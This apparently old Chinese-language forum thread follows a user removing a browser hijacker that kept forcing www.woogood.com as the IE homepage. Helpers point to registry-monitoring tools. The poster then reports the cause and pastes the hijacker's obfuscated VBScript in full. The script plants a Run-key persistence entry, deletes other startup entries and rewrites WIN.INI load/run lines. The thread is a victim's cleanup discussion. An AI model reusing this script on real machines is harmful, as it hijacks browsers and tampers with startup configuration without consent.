这个恶意网站(www.woogood.com)很烦,不但修改了IE的主页和默认页,而且将注册表中所有有关IE的项都设成www.woogood.com,最可恶的是,我将注册表中的这个网址清除后,重新启动系统后注册表又被改了(IE也被修改了).我想一定是有一只程序在启动时执行并修改注册表和IE,但苦于找不出是那一支程序.所以想写一个小程序跟踪是什么程序在启动时修改了注册表,不知哪位大大知道怎么做,不吝赐教.

試試 RegNotifyChangeKeyValue API http://delphi.about.com/library/weekly/aa052003a.htm http://zealot.yculblog.com/post-48093.html -- Everything I say is a lie.

谢谢hagar,您提供的两个链接好象均是说明怎样监视注册表改变的（英文链接还没仔细读，要花些时间）。这也是我需要的，只是有没有办法知道是哪支程序修改的注册表--这似乎要跟踪WINDOWS的工作过程

不好意思，插個花: 請您試試這個工具regmon，可以對程式訪問註冊表進行即時的檢測。 http://www.sysinternals.com/ntw2k/source/regmon.shtml 而且該工具提供code，您可以研究一下，希望能對您解決問題有所幫助！

===============
人生在勤,不索何获? 
===============

------
人生在勤，不索何获？

Hi fongwy 您好: 小弟之前也遇過, 有些大陸網站都這樣, 不曉得用意為何. 解決方法 http://www.binbin.net/messages/qa_win_ie/0079.htm http://www.binbin.net/messages/qa_win_ie/0102.htm 我不是高手, 高手是正在銀幕前微笑的人. 發表人 - miles 於 2004/06/30 15:42:46

------


我不是高手, 高手是正在銀幕前微笑的人.

感谢三位仁兄,我已经找到原因了 ,真是大快人心,这个网站缠了我好几个月,让我每次上网都必须先看到它. 原来在注册表的HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run等位置有一项值为regedit -s C:\$NtUninstallQ887678$\WINSYS.cer,以前不确定它是干什么的,今天特意试了一下:将注册表中所有www.woogood.com删除,运行regedit -s C:\$NtUninstallQ887678$\WINSYS.cer,果然所有删除的项又恢复到.找到C:\$NtUninstallQ887678$\下有一个WINSYS.vbs,其内容如下,把注册表中的regedit -s C:\$NtUninstallQ887678$\WINSYS.cer都删除,并删除WINSYS.vbs问题就解决了. 但还有一个问题,谁能帮我解读下面的代码,它是如何将www.woogood.com插入注册表的. Set sss = CreateObject("WSc" "ript.Sh" "ell") mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\" mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\" mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\" sss.RegWrite ""&mhk&"WlN32","regedit -s C:\$NtUninstallQ887678$\WINSYS.cer" sss.RegWrite ""&mhk&"internat.exe","internat.exe" sss.RegWrite ""&mhk&"zwupdows","12" sss.RegWrite ""&mhk&"win","12" sss.RegWrite ""&mhk&"mwin","12" sss.RegWrite ""&mhk&"internt","12" sss.RegWrite ""&mhk&"Inernet","12" sss.RegWrite ""&mhk&"Internet","12" sss.RegWrite ""&mhk&"iexpleror","12" sss.RegWrite ""&mhk&"zxdows","12" sss.RegWrite ""&mhk&"qwe","12" sss.RegWrite ""&mhk&"win1","12" sss.RegWrite ""&mhk&"intelnat.exe","12" sss.RegWrite ""&mhk&"u1888","12" sss.RegWrite ""&mhk&"intenet","12" sss.RegWrite ""&mhk&"9i5zxdows","12" sss.RegWrite ""&mhk&"9i5com01zxdows","12" sss.RegWrite ""&mhk&"99zxdows","12" sss.RegWrite ""&mhk&"88zxdows","12" sss.RegWrite ""&mhk&"Start Pagewin","12" sss.RegWrite ""&mhk&"Start Page","12" sss.RegWrite ""&mhk&"u188","12" sss.RegWrite ""&mhk&"9i5comzxdows","12" sss.RegWrite ""&mhk&"9q5zxdows","12" sss.RegWrite ""&mhk&"u1881","12" sss.RegWrite ""&mhk&"u1882","12" sss.RegWrite ""&mhk&"u1883","12" sss.RegWrite ""&mhk&"u1884","12" sss.RegWrite ""&mhk&"u1885","12" sss.RegWrite ""&mhk&"u1886","12" sss.RegWrite ""&mhk&"u1887","12" sss.RegWrite ""&mhk&"u88y", "12" sss.RegWrite ""&mhk&"flash", "12" sss.RegWrite ""&mhk&"999izxdows","12" sss.RegWrite ""&mhk&"033zxdows","12" sss.RegWrite ""&mhk&"syste","12" sss.RegWrite ""&mhc&"my","12" sss.RegWrite ""&mhk&"3zxdows","12" sss.RegWrite ""&mhk&"88u88","12" sss.RegWrite ""&mhk&"system","12" sss.RegWrite ""&mhk&"8zxdows","12" sss.RegWrite ""&mhk&"u18","12" sss.RegWrite ""&mhk&"interneet.exe","12" sss.RegWrite ""&mhk2&"RunOnce\", "12" sss.RegWrite ""&mhk&"iexpler", "12" sss.RegWrite ""&mhk&"u1810", "12" sss.RegWrite ""&mhk&"winwin", "12" sss.RegWrite ""&mhk&"WIN32", "12" sss.RegWrite ""&mhk&"W1N32", "12" sss.RegDelete ""&mhc&"" sss.RegDelete ""&mhk&"zwupdows" sss.RegDelete ""&mhk&"win" sss.RegDelete ""&mhk&"mwin" sss.RegDelete ""&mhk&"internt" sss.RegDelete ""&mhk&"inernet" sss.RegDelete ""&mhk&"Internet" sss.RegDelete ""&mhk&"u188" sss.RegDelete ""&mhk&"iexpleror" sss.RegDelete ""&mhk&"zxdows" sss.RegDelete ""&mhk&"qwe" sss.RegDelete ""&mhk&"win1" sss.RegDelete ""&mhk&"intelnat.exe" sss.RegDelete ""&mhk&"intenet" sss.RegDelete ""&mhk&"9i5zxdows" sss.RegDelete ""&mhk&"9i5com01zxdows" sss.RegDelete ""&mhk&"99zxdows" sss.RegDelete ""&mhk&"88zxdows" sss.RegDelete ""&mhk&"Start Pagewin" sss.RegDelete ""&mhk&"Start Page" sss.RegDelete ""&mhk&"9i5comzxdows" sss.RegDelete ""&mhk&"9q5zxdows" sss.RegDelete ""&mhk&"999izxdows" sss.RegDelete ""&mhk&"033zxdows" sss.RegDelete ""&mhk&"u1881" sss.RegDelete ""&mhk&"u1882" sss.RegDelete ""&mhk&"u1883" sss.RegDelete ""&mhk&"u1884" sss.RegDelete ""&mhk&"u1885" sss.RegDelete ""&mhk&"u1886" sss.RegDelete ""&mhk&"u1887" sss.RegDelete ""&mhk&"u88y" sss.RegDelete ""&mhk&"flash" sss.RegDelete ""&mhk&"88u88" sss.RegDelete ""&mhk&"interneet.exe" sss.RegDelete ""&mhk&"u18" sss.RegDelete ""&mhk&"u1888" sss.RegDelete ""&mhk&"system" sss.RegDelete ""&mhk&"3zxdows" sss.RegDelete ""&mhk&"8zxdows" sss.RegDelete ""&mhk&"syste" sss.RegDelete ""&mhk2&"RunOnce\" sss.RegDelete ""&mhk&"iexpler" sss.RegDelete ""&mhk&"u1810" sss.RegDelete ""&mhk&"winwin" sss.RegDelete ""&mhk&"WIN32" sss.RegDelete ""&mhk&"W1N32" Set FSO = CreateObject("Scrip" "ting." "FileSyst" "emO" "bject") myfile14=FSO.FileExists("c:\wind" "ows\W" "IN.INI") if myfile14 then set FSO2=FSO.OpenTextFile("c:\win" "dows\W" "IN.INI") mywin=FSO2.ReadALL() l=Instr(mywin,"run=")-3 m=Instr(mywin,"load=")-1 n=Instr(mywin,"NullPort=")-3 FSO2.close if l>0 and m>0 and l>m then set FSO3=FSO.OpenTextFile("c:\wi" "ndows\W" "IN.INI") mywin2=FSO3.Read(l) FSO3.close set FSO4=FSO.OpenTextFile("c:\win" "dows\WI" "N.INI") mywin3=FSO4.Read(m) FSO4.close if n>0 and n>l then set FSO5=FSO.OpenTextFile("c:\wind" "ows\WIN" ".INI") mywin4=FSO5.Read(n) FSO5.close mywin=Replace(mywin,mywin4,"") set FSO2=FSO.CreateTextFile("c:\win" "dows\WI" "N.INI") FSO2.Write mywin3 FSO2.WriteLine "load=" FSO2.Write "run=" FSO2.Write mywin FSO2.close else mywin=Replace(mywin,mywin2,"") set FSO2=FSO.CreateTextFile("c:\win" "dows\WI" "N.INI") FSO2.Write mywin3 FSO2.Write "load=" FSO2.Write mywin FSO2.close end if end if end if